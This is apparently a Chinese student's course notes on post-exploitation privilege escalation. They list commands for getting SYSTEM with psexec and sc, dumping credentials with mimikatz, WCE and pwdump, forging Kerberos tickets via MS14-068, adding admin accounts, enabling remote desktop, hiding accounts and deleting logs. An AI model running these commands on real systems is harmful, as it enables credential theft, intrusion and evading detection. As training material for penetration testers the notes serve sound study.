安全牛笔记（六）提权

Aspark

（六）提权

---

本地提权

1. 已实现本地低权限账号登录
   
2.     远程溢出
   
3.     直接获得账号密码
   
4. 希望获取更高权限
   
5.     实现对目标进一步控制
   
6. 
   
7. 系统账号之间权限隔离
   
8.     操作系统安全的基础
   
9.     用户空间
   
10.     内核空间
    
11. 系统账号
    
12.     用户账号登陆时获取权限令牌
    
13.     服务账号无需用户登陆已在后台启动服务

复制代码

1. Windows
   
2.     user
   
3.     Administrator
   
4.     System
   
5. Linux
   
6.     User
   
7.     Root

复制代码

ADMIN提权为SYSTEM

1. Windows system账号
   
2.     系统设置管理功能
   
3.     SysInternal Suite
   
4.         https://technet.microsoft.com/en-us/sysinternals/bb545027
   
5.         psexec -i -s -d taskmgr
   
6.     at 19:39 /interactive cmd
   
7.     sc Create syscmd binPath= "cmd /K start" type= own type= interact
   
8.     sc start syscmd

复制代码

注入进程提权

1. 隐蔽痕迹
   
2. pinjector.exe
   
3.     http://www.tarasco.org/security/Process_Injector/

复制代码

抓包嗅探

1. Windows
   
2.     Wireshark
   
3.     Omnipeek
   
4.     commview
   
5.     Sniffpass
   
6. Linux
   
7.     Tcpdump
   
8.     Wireshark
   
9.     Dsniff

复制代码

键盘记录

1. <p listlevel="0" style="text-align:left;" textalign="justify"><span class="color_font" style="font-size:16px;">Keylogger</span></p><p listlevel="0" style="text-align:left;" textalign="justify"><span class="color_font" style="font-size:16px;">木马窃取</span></p>

复制代码

本地缓存密码

1. 浏览器缓存的密码
   
2.     IE浏览器
   
3.     Firefox
   
4. 网络密码
   
5. 无线密码
   
6. http://www.nirsoft.net
   
7. 
   
8. Dump SAM
   
9.     Pwdump
   
10.     /usr/share/windows-binaries/fgdump/

复制代码

WINDOWS身份认证过程

WCE (WINDOWS CREDENTIAL EDITOR)

1. /usr/share/wce/
   
2. 需要管理员权限
   
3. wce-universal.exe -l / -lv
   
4. wce-universal.exe -d
   
5. wce-universal.exe -e / -r
   
6. wce-universal.exe -g
   
7. wce-universal.exe -w
   
8. LM/NT hash
   

复制代码

1. 从内存读取LM / NTLM hash
   
2. Digest Authentication Package
   
3. NTLM Security Package
   
4. Kerberos Security Package
   
5. 防止WCE攻击
   
6. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
   
7.     kerberos
   
8.     msv1_0
   
9.     schannel
   
10.     wdigest
    
11.     tspkg
    
12.     pku2u

复制代码

其他工具

1. pwdump localhost
   
2. fgdump
   
3. mimikatz
   
4.     privilege::debug #提升权限
   
5.     sekurlsa::logonPasswords
   
6.     ::

复制代码

利用漏洞提权

1. Ms11-080
   
2. Kb2592799
   
3.     https://technet.microsoft.com/library/security/ms11-080
   
4. Pyinstaller
   
5.     https://pypi.python.org/pypi/PyInstaller/2.1
   
6.     python pyinstaller --onefile ms11-080.py
   
7. Pywin32
   
8.     http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/
   
9. MS11-046
   
10.     DoS
    
11. 
    
12. Ms14-068
    
13. 库
    
14.     https://github.com/bidord/pykek
    
15. ms14-068.py -u user@lab.com -s userSID -d dc.lab.com
    
16. 拷贝 TGT_user1@lab.com.ccache 到windows系统
    
17. 本地管理员登陆
    
18.     mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exit
    
19. 
    
20. Ubuntu11.10
    
21.     http://old-releases.ubuntu.com/releases/11.10/
    
22. gcc
    
23.     sudo apt-cdrom add && sudo apt-get install gcc
    
24.     gcc 18411.c -o exp
    
25. CVE-2012-0056
    
26.     /proc/pid/mem
    
27.     kernels >=2.6.39
    
28.     http://blog.zx2c4.com/749

复制代码

利用配置不当提权

1. 与漏洞提权相比 更常用的方法
   
2.     企业环境
   
3.     补丁更新的全部已经安装
   
4.     输入变量过滤之外更值得研发关注的安全隐患
   
5.     以system权限启动
   
6.     NTFS权限允许users修改删除
   
7. 
   
8. icacls
   
9.     icacls c:\windows\*.exe /save perm /T
   
10.     i586-mingw32msvc-gcc -o admin.exe admin.c
    
11. Find
    
12.     find / -perm 777 -exec ls -l {} \;
    
13. 
    
14. 应用系统的配置文件
    
15.     应用连接数据库的配置文件
    
16.     后台服务运行账号

复制代码

基本信息收集

1. Linux
   
2.     /etc/resolv.conf
   
3.     /etc/passwd
   
4.     /etc/shadow
   
5.     whoami ，who –a
   
6.     ifconfig -a, iptables -L -n, netstat –rn
   
7.     uname –a, ps aux
   
8.     dpkg -l| head
   
9. 
   
10. Windows
    
11.     ipconfig /all , ipconfig /displaydns, netstat -bnao , netstat –r
    
12.     net view , net view /domain
    
13.     net user /domain, net user %username% /domain
    
14.     net accounts, net share
    
15.     net localgroup administrators username /add
    
16.     net group "Domain Controllers" /domain
    
17.     net share name$=C:\ /unlimited
    
18.     net user username /active:yes /domain

复制代码

WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)

1. wmic nicconfig get ipaddress,macaddress
   
2. wmic computersystem get username
   
3. wmic netlogin get name,lastlogon
   
4. wmic process get caption, executablepath,commandline
   
5. wmic process where name=“calc.exe" call terminate
   
6. wmic os get name,servicepackmajorversion
   
7. wmic product get name,version
   
8. wmic product where name=“name” call uninstall /nointeractive
   
9. wmic share get /ALL
   
10. wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
    
11. wmic nteventlog get path,filename, writeable

复制代码

收集敏感数据

1. 商业信息
   
2. 系统信息
   
3. Linux
   
4.     /etc ;/usr/local/etc
   
5.     /etc/passwd ;/etc/shadow
   
6.     .ssh ;.gnupg 公私钥
   
7.     The e-mail and data files
   
8.     业务数据库 ;身份认证服务器数据库
   
9.     /tmp
   
10. 
    
11. windows
    
12.     SAM 数据库 ; 注册表文件
    
13.     %SYSTEMROOT%\repair\SAM
    
14.     %SYSTEMROOT%\System32\config\RegBack\SAM
    
15.     业务数据库 ; 身份认证数据库
    
16.     临时文件目录
    
17.     UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\

复制代码

隐藏痕迹

1. 禁止在登陆界面显示新建账号
   
2. REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0
   
3. del %WINDIR%\*.log /a/s/q/f
   
4. History
   
5. 日志
   
6.     auth.log / secure
   
7.     btmp / wtmp
   
8.     lastlog / faillog
   
9. 其他日志和 HIDS 等

复制代码